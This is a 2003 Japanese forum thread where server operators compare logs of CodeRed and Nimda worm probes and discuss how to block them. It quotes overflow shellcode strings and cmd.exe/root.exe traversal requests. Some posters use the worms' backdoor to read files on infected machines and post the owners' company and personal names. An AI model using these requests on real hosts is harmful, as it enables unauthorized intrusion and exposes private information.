03/04/15 17:33 .net
>>99
うちもきてるよ。
101:DNS未登録さん
03/04/15 19:33 .net
これが、この板の現実でしょ。悲しいけど。
102:DNS未登録さん
03/04/16 11:38 .net
CodeRedが大量に来てますね...
⇒219.156.232.21
219.237.77.95
219.181.154.52
219.140.211.162
12.235.16.127
あと、ガーラって調査会社のロボット検索もウザイ
⇒211.4.250.133
103:DNS未登録さん
03/04/16 15:34 .net
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
NetRange: 219.0.0.0 - 219.255.255.255
CIDR: 219.0.0.0/8
NetName: APNIC5
NetHandle: NET-219-0-0-0-1
104:DNS未登録さん
03/04/16 15:35 .net
OrgName: AT&T WorldNet Services
OrgID: ATTW
Address: 400 Interpace Parkway
City: Parsippany
StateProv: NJ
PostalCode: 07054
Country: US
NetRange: 12.0.0.0 - 12.255.255.255
CIDR: 12.0.0.0/8
NetName: ATT
NetHandle: NET-12-0-0-0-1
105:DNS未登録さん
03/04/16 15:37 .net
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.4.250.0
b. [ネットワーク名] I2TS-NET
f. [組織名] 株式会社イーツ
g. [Organization] I2ts Inc.,
m. [運用責任者] MK5986JP
n. [技術連絡担当者] HI1771JP
n. [技術連絡担当者] MK5986JP
>>102
ってなってるけど、がーらって会社なの?
106:DNS未登録さん
03/04/16 17:55 .net
>>105
ネタですか?(w
107:DNS未登録さん
03/04/16 20:24 .net
>>105
nslookupで逆引きすると、gala-net.co.jpという
ドメインが出てきます。何の会社かと思って
ホームページを見たら、ネット上の書き込みを
自動巡回してチェックするサービスを提供していました。
最近、フレッシュアイのロボット検索が定期的に
来るようになって、フレッシュアイにも情報が
登録されたんですが、それをガーラのロボットが
検出して、探りを入れに来ているようです。
108:山崎渉
03/04/17 12:00 .net
(^^)
109:DNS未登録さん
03/04/18 23:31 9c62ManQ.net
YahooBB220013168112.bbtec.net - - [18/Apr/2003:23:11:33 +0900] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178
220.13.168.112うざすぎ。
YBBにメールして遮断できないものだろうか…
110:DNS未登録さん
03/04/19 01:06 .net
>>109
ごめん
111:DNS未登録さん
03/04/19 01:07 .net
>>100
来ている来ていないの問題じゃなくて(ry
112:DNS未登録さん
03/04/19 09:15 .net
>>109
YBBならIP変わらないみたいだから、アクセス制限リストに
放り込んで置けば宜しいかと。まあ、それでも鬱陶しい
事に変わりは無いけど。
113:DNS未登録さん
03/04/19 22:57 .net
>>109
入り込んで止めてあげたら?(w
114:山崎渉
03/04/20 05:53 .net
∧_∧
( ^^ )< ぬるぽ(^^)
115::
03/04/21 18:07 j62Px7e4.net
☆^~^★ 50音順で探せて楽して得する
URLリンク(sagatoku.fc2web.com)
あなたの探し物きっとみつかるよ☆^~^★
116:DNS未登録さん
03/04/22 04:26 .net
>>113
それってCodeGreen…w
117:DNS未登録さん
03/04/30 19:11 .net
最近こんなのが来てる。
202.98.1.21 - - [27/Apr/2003:16:37:47 +0900] "GET / HTTP/1.1" 400 296 "-" "-"
202.98.1.21 - - [27/Apr/2003:16:37:48 +0900] "POST / HTTP/1.1" 413 1035 "-" "-"
118:初心者
03/04/30 21:09 .net
当方やふーbbですが、
昨日Anhttpdで適当にweb鯖を立てて放置したところ
いろいろ釣れました。
なんですかコリャ?
相手もやふーbbのようで。。
感染したワームが、一体何をしようとしているのだかよく分からんが
xが延々と並んでいるのが、噂に聞くバッファオーバーフローってやつですか?
一日中こんなの送ってきて動作が重くなったりしないんだろか
219.144.82.204 - - [30/Apr/2003:20:23:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u
8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:45:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 211
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:01 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:02 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
119:初心者
03/04/30 21:14 .net
って最初の219.144.82.204は中国の鯖っぽいな。
アクセスしようとしたら漢字だらけの404が返ってきた。
やふーbbの方はアホなユーザーがワームに感染していることも知らず
繋ぎっ放しにしているのかなぁ・・・
120:DNS未登録さん
03/04/30 21:14 .net
飽きるほど見たNimdaだな。
121:DNS未登録さん
03/04/30 21:28 .net
感染していることすら判断できない、バカユーザがIISを立ち上げていることに疑問を感じるが。
122:DNS未登録さん
03/05/01 00:23 .net
つーか、>119は僅か100程のレスを遡って見る事もできんのか・・・
123:119
03/05/01 00:56 .net
>>122
すんマソ。良く見たら
殆んど同じような報告がいくつも書かれていた…。
初心者なので変なのが飛んできたことが嬉しくて
ついつい書いてしまったのでつた。
124:119
03/05/01 01:05 .net
こう言うワームの類って、
鯖にセキュリティーホールが無ければ直接害は無いんだよね?
しかし大量に飛んでくると
ログ作成するのに負荷が掛かるってのがあるか…
ルーターでワームだけをカットするような設定は、
簡単には出来るんかなぁ
IP指定するのは当然出来るが
こうあちこちから飛んでくると切りが無い。
125:DNS未登録さん
03/05/02 11:05 .net
だから、IP弾きは自動化できないって・・・
つーか動的IPや踏み台等を完全場合わけで簡単自動処理できるのがあるなら
教えてもらいたい・・・
なんも考えないでニムダやCodeRedを飛ばしてくるIPをブラックリストに入れると
困る可能性がある。
困ったときには、どこのブラックリストの一部が困ったのかわからないので
ブラックリスト自体を消す羽目になる。
以上無理。
126:DNS未登録さん
03/05/02 22:29 .net
IPを弾くのではなく、ワームが送るヘッダーの特徴を検出して削除する
ハードウェアルータがあったら良いのにな
もちろん検出パターンはメーカーからの自動更新で。
127:DNS未登録さん
03/05/02 23:18 .net
>>118
219.180.88.36 のは日本だし、めちゃくちゃちゃねらーだな (藁
URLリンク(219.180.88.36)"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
128:DNS未登録さん
03/05/03 00:31 .net
>>127
> Windows 2000 Version: 5.0
> 現在のビルド: 2195
> Service Pack: None
> 現在のタイプ: Uniprocessor Free
> 登録されている会社名: (・∀・)
> 登録されている所有者: (・∀・)
禿げ藁
常時接続のくせにServicePackも当てとらんとは、
もしや、ワレザーだったりしてな。
今頃Winnyでエロ画像落としてハァハァしてるんだろ
129:DNS未登録さん
03/05/03 02:47 .net
MSNメッセンジャーとかIE、メモ帳位しか開いてないやん。
tptp.exeが大活躍していたりはするけどw
2ちゃんねらーにしては激しくツマンナイ椰子やね。
こういうのが糞スレ立てるんだろうな。
130:129
03/05/03 02:49 .net
tftp.exeの間違い(欝氏
131:DNS未登録さん
03/05/03 11:11 OG87RHjs.net
WHOISでみるかぎりコリアみたいですねー
210.95.90.50 - - [02/May/2003:12:57:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
これはチャイナ
210.72.239.240 - - [02/May/2003:09:53:08 +0900] "GET /default.ida?XXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
132:DNS未登録さん
03/05/03 12:20 8w0u+xU1.net
とりあえず、今日だけの分でも素のIPを晒します。
211.153.19.148
211.180.229.213
211.114.27.16
211.249.78.151
211.116.251.18
上から順に新しい
全てCoderedに感染。しかも日本のIPかな?よく分からん。
133:DNS未登録さん
03/05/03 12:23 8w0u+xU1.net
って調べたら、前のとあわせて全部国はオーストラリアじゃん!!
134:DNS未登録さん
03/05/03 12:26 7iA2vytO.net
URLリンク(www13.big.or.jp)
荒らしてもただ見るだけでもOK。これからどんどんロム増えるから。
これと同じヤツをいろんなヤツにコピペしてね
135:DNS未登録さん
03/05/03 13:27 .net
>>133
馬鹿は whois を使うな。
136:DNS未登録さん
03/05/03 20:46 .net
>>126
IDSを使うといいかも。個人向けにはトレンドマイクロから出ている。
NTTからFlet'sユーザー向けのOEM版も販売されている。ただ、
スループットが低いので、光ユーザーだと勿体無い。
URLリンク(www.trendmicro.com)
>>127
>>128
>>129
不味くないか?
137:DNS未登録さん
03/05/04 01:25 .net
>>127-129
通報しますた!
と、言いたい所だが不正アクセス等を
相手は全く理解していない予感…
138:
03/05/08 14:27 .net
少なくともこれらのリクエスト送ってくるヤツらは
MSのIISを立ち上げてる、と考えていいのですか?
202.125.153.14
61.187.64.194
202.39.15.237
202.131.151.20
202.194.196.67
これらはホスト名逆引きできないんですが、どういうことでしょうか。
139:138
03/05/08 14:29 .net
ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。
140:DNS未登録さん
03/05/08 16:36 .net
>>138
> これらはホスト名逆引きできないんですが、どういうことでしょうか。
ISPが設定していないから。(.paknet.com.pk .twnic.net .estelcom.com .edu.cn .chinanet.cn.net)
>>139
> ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。
赤帽と窓のデュアルブート環境だから。
141:DNS未登録さん
03/05/08 16:41 .net
キャリア
142:
03/05/10 04:49 .net
赤帽と窓のデュアルブート環境だから。
意味が分からない、apacheが立ち上がってるのに
なぜIISに感染するcode redが動いてるの?
Linuxが動いてるはずなのに。
143:DNS未登録さん
03/05/10 11:09 .net
再接続でアドレスが変わったんじゃなーの?
んで、たまたま新たに割り振られた先に赤帽&apacheがあったとか。
144:演@ usen-43x233x52x230.ap-USEN.usen.ad.jp
03/05/10 11:44 .net
>>142
Win32版&IISだったとか(Linuxの根拠は。
145:DNS未登録さん
03/05/10 14:08 .net
>144
実際にアクセスしてみてヘッダを見てからの発言だろーな?
146:演@ usen-43x233x52x230.ap-USEN.usen.ad.jp
03/05/10 18:43 .net
>>146
ルータの下でポートフォワードで複数動かしてるとか。
147:DNS未登録さん
03/05/10 19:51 .net
自問自答ですか?
148:DNS未登録さん
03/05/11 02:29 .net
ログの中にこんなの発見した
218.20.118.230 - - [09/May/2003:05:41:08 +0900] "GET URLリンク(www.21cn.net) HTTP/1.1" 200 1529
何?
149:
03/05/11 03:27 .net
というか、不毛にIIS動かしてるバカ多すぎ。
トラフィックの無駄遣いも甚だしい。
どうせ何のサービスかわかってないような輩だろ。
NT系、デフォルトでIISなんて入ってないはずなのに
なんで動いてるんだ。取り敢えず腹が立つ。
150:DNS未登録さん
03/05/11 03:59 .net
202.196.110.208 - - [11/May/2003:00:01:29 +0900] "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 2973 "-" "-"
URLリンク(202.196.110.208)
チョン国の中学校の鯖が感染しております。
なんてメールしたらいいかな「貴方感染。鯖PC code red」漢文わからん(T_T)
>>128のような情報を引っ張るにはどうしたらいいの?
URLリンク(IP)アドレス/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
ってリクエストすればいいの?404なったけど。
151:DNS未登録さん
03/05/11 10:37 M3fadPgI.net
URLリンク(bizinfo.cool.ne.jp)
152:DNS未登録さん
03/05/11 13:26 x4ndWFzf.net
>貴方感染
もしかしたら、なんとなく程度だとしても意味が通じるかもしれない
>鯖PC
これは絶対無理(藁
153:DNS未登録さん
03/05/11 13:29 .net
>>150
英語で送っとけ
中国のエリートならペラペラだから
154:DNS未登録さん
03/05/11 14:10 .net
そして、その中国のエリートが管理する鯖は穴だらけ。
155:●かろりーたさん ◆JwU5Ac6TK2
03/05/11 14:56 .net
>>148
URLリンク(www.21cn.net)
がそのIPアドレスにあると勘違い(?)して参照しようとしてきたリクエスト
156:DNS未登録さん
03/05/11 14:57 .net
串
157:DNS未登録さん
03/05/11 15:21 .net
>>149
漏れW2Kでサービスをいじってたら、
知らぬ間にIISが動作していたよ・・・
ANHTTPD起動しようとしたが
80番ポートが開いてないエラーが出るので調べていたら発覚した
そんな香具師が意外と多い予感
158:貴方感染
03/05/11 15:52 .net
>貴方感染
我SARS否
とか、帰ってきそう(汗
>>149
>>157
そうなんですよね。
ウイルス対策も分からないやつが、標準で入らないIISを入れてしまっていることに
やり場のない怒りと、やるせなさと…
159:148
03/05/11 19:09 .net
>>155
なるほど。
けどうちはURLリンク(www.21cn.net)じゃないのになぜ200を返したんでしょうか?
cmd.exe、root.exe、favicon.ico、default.ida等には404を返しているのに。
160:DNS未登録さん
03/05/11 20:36 .net
>>159
踏み台にして失敗したものです。
気になるようだったら、
SetEnvIf HOST FQDN allowed01
deny from env=!allowed01
にしとけば、403返すかと。
161:演@ usen-43x233x52x230.ap-USEN.usen.ad.jp
03/05/12 02:43 .net
>>150
>貴方感染
チョン環境っていうより大陸向けのような気もします。
半島って標準で和文や簡体、繁体フォント入ってるのかなあ。
マジレスすると普通に
Your environment is infected with the virus
and it is troubled. Please carry out somehow.
とかのほうが(文字コードだなんだ考えずに済んで)いいと思います。
162:148-159
03/05/12 13:50 .net
>>160
あ、そうだったんですか。
うちが荒らされたりする分にゃ自分が我慢すれば済むけど、よそ様まで巻き込むのは不本意です。
教えていただいた「SetEnvIf HOST FQDN allowed01」を勉強のために検索してみました。
「Host:ヘッダーを指定しないリクエストを拒否する方法。」として、「ワームは、DNSの逆引きでもしない限り
HostヘッダにFQDN名をセットできない、よってIPアドレス指定でアクセスしてきても、404 Object Not Foundエ
ラーが返る。」とありましたので、httpd.confに設定してみました。
しばらくこれで様子を見てみます。ありがとうございました。
今月に入ってCodeRedが1日平均27個、先月あたりからだんだん増えてきているみたいです。
ネット上で見付けた「Code Red Check」というperl scriptと「dnstran」と「analog」使ってマメにログをチェ
ックするぐらいしか出来ませんが、地道にやっていきます。
163:DNS未登録さん
03/05/13 01:52 .net
64.110.110.240
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
(略)
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ090ヨ190ヨ0c3ヨ003ヨb00ヨ31bヨ3ffヨ078ヨ000ヨ0=a
ウガンダキタ━━━(゚∀゚)━━━━!!!!!
164:DNS未登録さん
03/05/15 09:44 NUYgsRrd.net
202.107.205.9 - - [15/May/2003:02:00:06 +0900] "\x05\x01" 501 - "-" "-"
最近多いのですが、このリクエストは何でしょうか?新手のワーム?
165:DNS未登録さん
03/05/15 21:13 y3uNO88M.net
219.218.95.81 - - [15/May/2003:17:46:54 +0900]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 274 "-" "-"
166:_
03/05/15 21:49 .net
∋8ノノハ.∩
川o・-・)ノ <先生!こんなのがありました!
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
URLリンク(www.hiroyuki.zansu.com)
URLリンク(hiroyuki.zansu.com)
167: ◆CfyWV6PsHI
03/05/16 00:12 .net
ワーム対策にバーチャルホストはどうよ
HTTP_HOSTがない場合はダミーページの飛ばす
168: ◆CfyWV6PsHI
03/05/16 00:14 .net
ログをバーチャルホスト毎に記録すれば
ワームのログは通常のログに混じらないが
169:山崎渉
03/05/22 01:54 .net
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
170:DNS未登録さん
03/05/23 20:57 .net
203.222.151.18 - - [23/May/2003:06:21:48 +0900] "GET (^^) HTTP/1.0" 404 1373
171:山崎渉
03/05/28 17:09 .net
∧_∧
ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。
=〔~∪ ̄ ̄〕
= ◎―◎ 山崎渉
172:DNS未登録さん
03/05/29 00:01 .net
初心者からの素朴な疑問
例えば、
c:/www/scripts/..チ/winnt/system32/cmd.exe
にワームがアクセスしてくるとしますよね。
該当するディレクトリを作って、cmd.exeって名前のファイル(例えばフロッピーにアクセスし続けるファイルとか)置いといたらどうなるんでしょ?
173:DNS未登録さん
03/05/31 23:54 9YFZ/gSa.net
きのうの夕方に同一IPから5秒おきに20連発
"GET /NULL.IDA?CCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000
%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000
%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\
xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\
x90\x90\x90\x8b\xf7f\xb8H\x063 ...
<以下略、とても長い>
174:DNS未登録さん
03/06/01 07:30 .net
>>173
それうちにも来た。
そのあとなんか意味不明な文字があってしかもログが改行されちゃう。
何なのそれ?
175:DNS未登録さん
03/06/01 13:04 .net
>>174
スレリンク(mysv板:170番)
176:DNS未登録さん
03/06/10 00:05 .net
久々にIRC繋いだら、こんなん帰ってきたのだが…
irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272
ワームチェックかなんかでしょうか?
177:
03/06/14 03:18 .net
URLリンク(yahoobb219055208068.bbtec.net)
バッチリ幹線してるようです。
[2ch@localhost 2ch]wget --spider URLリンク(yahoobb219055208068.bbtec.net)
1 HTTP/1.1 200 OK
2 Server: Microsoft-IIS/5.0
3 Date: Fri, 13 Jun 2003 18:18:56 GMT
4 Connection: keep-alive
5 Connection: Keep-Alive
6 Content-Length: 1230
7 Content-Type: text/html
8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/
9 Cache-control: private
200 OK
どうやって警告したらいいでしょうか。
178:
03/06/14 03:21 .net
ftpとか開いてるし、アノニログインできるし(;´Д`)
厨房運営の鯖でしょうか。
Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
6699/tcp open napster
179:
03/06/14 03:25 .net
いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな?
hURLリンク(yahoobb219055208068.bbtec.net)"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
アプリケーション例外が発生しました:
アプリケーション: (pid=1020)
発生時間: 2003/05/01 @ 21:50:51.907
例外番号: c0000005 (アクセス違反)
*----> システム情報 <----*
コンピュータ名: VFGYARXITW27V4Y
ユーザー名: Administrator
プロセッサの数: 1
プロセッサの種類: x86 Family 6 Model 8 Stepping 6
Windows 2000 Version: 5.0
現在のビルド: 2195
Service Pack: None
現在のタイプ: Uniprocessor Free
登録されている会社名: 日本フレートライナー(株)
登録されている所有者: 山﨑勝行
180:DNS未登録さん
03/06/14 05:53 .net
>>179
通報しますた。
181:DNS未登録さん
03/06/14 07:32 CsSAkb5z.net
キタ━━━(゚∀゚)━━━!!!!
URLリンク(homepage3.nifty.com)
182:DNS未登録さん
03/06/14 10:32 O9Qyx1v0.net
これはもう警鐘モンだぞ。
パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。
212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX(rya
URLリンク(212.165.132.144)"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
Application exception occurred:
App: (pid=1568)
When: 6/2/2003 @ 02:07:38.527
Exception number: c0000005 (access violation)
*----> System Information <----*
Computer Name: CISCO-ACS
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 8 Stepping 10
Windows 2000 Version: 5.0
Current Build: 2195
Service Pack: None
Current Type: Uniprocessor Free
Registered Organization: prestel
Registered Owner: okada
okadaって日本人か?
183:DNS未登録さん
03/06/14 12:11 .net
(´-`).。oO(不正にアクセスして個人情報開示してるバカだよなぁ・・・)
184:DNS未登録さん
03/06/14 12:25 .net
日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような
185:DNS未登録さん
03/06/14 12:29 .net
ややグレーゾーンに近いがな。
インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。
186:DNS未登録さん
03/06/14 22:35 .net
わたしのホームページへアクセスした人は、不正アクセスでタイーホしてもらいます(w
187:DNS未登録さん
03/06/16 06:20 .net
Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
は Code Green の物らしい。
ウイルスだった事には変わりは無いわけだが。
188:187
03/06/16 06:22 .net
あ、その下の物の方が重要っぽい。失礼
189:DNS未登録さん
03/06/17 18:35 .net
かぎの開いている家に侵入して情報ファイルを持ち出したら
そいつは窃盗罪だろう。
不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を
公開したりしてなにか損害が起きればけっこう痛いことになるかもね
190:DNS未登録さん
03/06/25 00:41 .net
保守age
191:DNS未登録さん
03/06/25 18:58 wfI9oVW0.net
超過激ライブチャット登場!!!!!
あなたの命令で若い娘たちがヌレヌレモードへ
☆★アメリカ西海岸発☆★モザイクなし☆★
あなたの言葉で・・・ヌードにさせてください
あなたの指で・・・感じさせてください
あなたの声で・・・イ・カ・セ・テ・ください
寂しがりやの留学生の若い娘がお待ちしております!
ただいま、10分間無料で体験できるほか7日間会費無料!!
URLリンク(www.gals-cafe.com)
192:DNS未登録さん
03/06/27 23:41 .net
>>190
喪前がageるから・・・
193:DNS未登録さん
03/07/03 03:00 .net
6月分のcodered。
01/Jun/2003 30
02/Jun/2003 37
03/Jun/2003 24
04/Jun/2003 31
05/Jun/2003 30
06/Jun/2003 24
07/Jun/2003 24
08/Jun/2003 27
09/Jun/2003 31
10/Jun/2003 38
11/Jun/2003 30
12/Jun/2003 37
13/Jun/2003 40
14/Jun/2003 20
15/Jun/2003 25
16/Jun/2003 33
17/Jun/2003 27
18/Jun/2003 22
19/Jun/2003 21
20/Jun/2003 28
21/Jun/2003 24
22/Jun/2003 22
23/Jun/2003 27
24/Jun/2003 34
25/Jun/2003 26
26/Jun/2003 32
27/Jun/2003 33
28/Jun/2003 32
29/Jun/2003 24
30/Jun/2003 16
194:DNS未登録さん
03/07/05 03:27 .net
これワーム関係?初めて見たんだけど
それともアタック?
2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-"
2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-"
2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-"
2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-"
2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"
全67行
195:DNS未登録さん
03/07/05 04:45 .net
アクセスしようとしてるファイル名から推測すると
IIS狙いのワームでないかい?
うちにはまだお見えになられてないです
196:DNS未登録さん
03/07/05 14:20 .net
>>194
> 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"
cgiwrapの設定不備狙ってる?
IIS狙いとは言い切れない予感。
例の改ざん祭りの下準備かも((((((;゚Д゚))))))ガクガクブルブル
197:DNS未登録さん
03/07/05 17:11 .net
>196
祭りドコー?
198:DNS未登録さん
03/07/06 03:35 .net
スレリンク(newsplus板)
199:山崎 渉
03/07/15 11:10 .net
__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
200:DNS未登録さん
03/07/26 11:29 .net
孫さん家の人が衛生管理していないので、「出禁」にしています。
衛生管理出来る様になったら、タイム系サーバーを追加して
監視兵を置くかな・・・
201:DNS未登録さん
03/07/29 04:10 .net
そういえばどこかの検索エンジンのロボットはワームみたいな動きをしていくな。
202:DNS未登録さん
03/07/29 14:30 .net
最近、損さん家のf@t息子が猛烈アタックしてきます。
UDPの3010・3012・3013と投げてくるけど、これ何でしょ?
203:DNS未登録さん
03/07/29 17:23 .net
ロボットといえばnabotは迷惑だ
204:ぼるじょあ ◆ySd1dMH5Gk
03/08/02 05:04 .net
∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎―――◎ 山崎渉&ぼるじょあ
205:DNS未登録さん
03/08/05 10:38 .net
これって何かのウイルス?
今朝会社にきたら、↓と同じぺージに書き換えられてた。
URLリンク(217.127.31.195)
やられて放置してる鯖もイパーイなんですが・・・。↓
URLリンク(www.google.co.jp)
なんやのこれ~~~!
206:DNS未登録さん
03/08/05 10:39 FAyYsQpc.net
あげ
207:DNS未登録さん
03/08/05 11:08 .net
>>205
なんで書き換えられちゃうわけ?あなたの会社のサイト
ろくにパッチも当ててないDQN鯖官なのけ
208:205
03/08/05 11:11 .net
>>207
ごめん、動揺して説明たらずだった。
会社きて、自宅のHP見てみようとしたら、書き換えられてた。
自宅鯖はルータでHTTP、FTP,DNS,SSLのポートしか空けてねえです。
はぁ…
